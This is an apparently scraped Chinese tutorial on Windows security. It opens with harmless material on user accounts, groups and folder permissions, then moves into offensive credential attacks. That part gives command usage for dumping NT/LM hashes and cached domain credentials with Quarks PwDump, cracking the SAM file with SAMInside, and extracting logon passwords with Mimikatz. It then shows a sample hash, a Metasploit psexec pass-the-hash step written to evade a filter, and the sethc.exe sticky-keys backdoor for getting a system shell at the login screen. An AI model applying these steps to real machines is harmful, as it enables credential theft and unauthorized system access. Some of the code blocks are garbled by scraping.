標籤:account sts cal read 通用 相對 rip guests table
1.1、什麼是Window
Microsoft Windows,是美國微軟公司研發的一套作業系統,它問世於1985年,起初僅僅是Microsoft-DOS類比環境,後續的系統版本由於微軟不斷的更新升級,不但易用,也慢慢的成為家家戶戶人們最喜愛的作業系統。Windows採用了圖形化模式GUI,比起從前的DOS需要鍵入指令使用的方式更為人性化。隨著電腦硬體和軟體的不斷升級,微軟的Windows也在不斷升級,從架構的16位、32位再到64位, 系統版本從最初的Windows 1.0 到大家熟知的Windows 95、Windows 98、Windows ME、Windows 2000、Windows 2003、Windows XP、Windows Vista、Windows 7、Windows 8、Windows 8.1、Windows 10 和 Windows Server伺服器企業級作業系統。
1.2、Windows常用使用者
- SYSTEM:本地機器上擁有最高許可權的使用者。
- Administrator:本地機器上擁有最高許可權的使用者。
- Guest:只擁有相對較少的許可權,預設被禁用。
1.3、Windows常見使用者組
Administrators,Administrator 群組,預設情況下,Administrators中的使用者對電腦/域有不受限制的完全訪問權。分配給該組的預設許可權允許對整個系統進行完全控制。所以,只有受信任的人員才可成為該組的成員。
Power Users,進階使用者組,Power Users 可以執行除了為 Administrators 組保留的任務外的其他任何作業系統任務。分配給 Power Users 組的預設許可權允許 Power Users 組的成員修改整個電腦的設定。但Power Users 不具有將自己添加到 Administrators 組的許可權。在使用權限設定中,這個組的許可權是僅次於Administrators的。
Users:普通使用者組,這個組的使用者無法進行有意或無意的改動。因此,使用者可以運行經過驗證的應用程式,但不可以運行大多數繼承應用程式。Users 組是最安全的組,因為分配給該組的預設許可權不允許成員修改作業系統的設定或使用者資料。Users 組提供了一個最安全的程式運行環境。在經過 NTFS 格式化的卷上,預設安全設定旨在禁止該組的成員危及作業系統和已安裝程式的完整性。使用者不能修改系統註冊表設定、作業系統檔案或程式檔案。Users 可以關閉工作站,但不能關閉伺服器。Users 可以建立本機群組,但只能修改自己建立的本機群組。
Guests:來賓組,按預設值,來賓跟普通Users的成員有同等訪問權,但來賓帳戶的限制更多。
Everyone:顧名思義,所有的使用者,這個電腦上的所有使用者都屬於這個組。
1.4、Windows檔案夾許可權
①完全控制(Full Control):
該許可權允許使用者對檔案夾、子檔案夾、檔案進行全權控制,如修改資源的許可權、擷取資源的所有者、刪除資源的許可權等,擁有完全控制許可權就等於擁有了其他所有的許可權;
②修改(Modify):
該許可權允許使用者修改或刪除資源,同時讓使用者擁有寫入及讀取和運行許可權;
③讀取和運行(Read & Execute):
該許可權允許使用者擁有讀取和列出資來源目錄的許可權,另外也允許使用者在資源中進行移動和遍曆,這使得使用者能夠直接存取子檔案夾與檔案,即使使用者沒有許可權訪問這個路徑;
④列出檔案夾目錄(List Folder Contents):
該許可權允許使用者查看資源中的子檔案夾與檔案名稱;
⑤讀取(Read):
該許可權允許使用者查看該檔案夾中的檔案以及子檔案夾,也允許查看該檔案夾的屬性、所有者和擁有的許可權等;
⑥寫入(Write):
該許可權允許使用者在該檔案夾中建立新的檔案和子檔案夾,也可以改變檔案夾的屬性、查看檔案夾的所有者和許可權等。
第二節 Windows密碼安全
工具一、Quarks PwDump
Quarks PwDump 是一個Win32環境下的系統授權資訊匯出工具,目前除此之外沒有任何一款工具可以匯出如此全面的資訊,支援這麼多的OS版本,且相當穩定。它目前可以匯出 :- Local accounts NT/LM hashes + history 本機NT/LM雜湊+曆史登入記錄 – Domain accounts NT/LM hashes + history 域中的NT/LM雜湊+曆史登入記錄 – Cached domain password 緩衝中的域管理密碼 – Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢複後遺留的資訊支援的作業系統 : XP/2003/Vista/7/2008/81 / USAGE
使用說明:
[Bash shell]
純文字查看
複製代碼?
010203040506070809101112 |
quarks-pwdump.exe <options> Options : -dhl --dump- hash - local -dhdc --dump- hash -domain-cached -dhd --dump- hash -domain (NTDS_FILE must be specified) -db --dump-bitlocker (NTDS_FILE must be specified) -nt --ntds- file FILE -hist --with- history (optional) -t --output- type JOHN /LC (optional, if no=>JOHN) -o --output FILE (optional, if no=>stdout) Example: quarks-pwdump.exe --dump- hash -domain --with- history |
工具二、SAMInside
SAMInside為一款俄羅斯出品的Windows密碼恢複軟體,支援Windows NT/2000/XP/Vista作業系統,主要用來恢複Windows的使用者登入密碼。
使用說明:
匯入本地系統和檔案,當然,也可以從專案檔、檔案匯入,注意SAM檔案是系統的SAM檔案,一般在C:\WINDOWS\system32\config路徑下,看:
按快速鍵“F4”,視密碼複雜程度、密碼長度和機器效能,有時很快就等到結果,如果時間過長,還可以暫停,儲存破解狀態留待下次接著運行。
工具三、Mimikatz
大神們都知道的東西吧,滲透測試常用工具。法國一個牛B的人寫的輕量級調試器,可以協助安全性測試人員抓取Windows密碼。
使用說明:
[Bash shell]
純文字查看
複製代碼?
1234 |
第一條:privilege::debug // 提升許可權 第二條:sekurlsa::logonpasswords // 抓取密碼 |
首先你需要知道自己作業系統的位元
右鍵我的電腦屬性
如果您的電腦是64位,則會明確標明“x64”,如果沒有標明則說明您的電腦是32位的。
第三節 利用Hash遠程登入系統
第二節我們擷取到的Hash:
[AppleScript]
純文字查看
複製代碼?
1 |
44 EFCE 164 AB 921 CAAAD 3 B 435 B 51404 EE : 32 ED 87 BDB 5 FDC 5 E 9 CBA 88547376818 D 4 |
開啟Metasploit
[Bash shell]
純文字查看
複製代碼?
1 |
use exploit /windows/smb/pse xec // 沒辦法,請去掉中間空格,在一起會被屏蔽 |
設定一下攻擊參數
設定Payload
無法利用怎麼辦?
本地暴力破解Hash
本地軟體下載彩虹表進行暴力破解我這裡就不講解了。
給大家一個線上破解的網站,方便快捷。
http://www.objectif-securite.ch/ophcrack.php
小技巧:Windows2003-Shift後門
Shift後門製作
sethc.exe就是Windows的相黏鍵,我們備份一下。
將cmd.exe改成sethc.exe
在使用者登入介面連按五次shift
深入瞭解Windows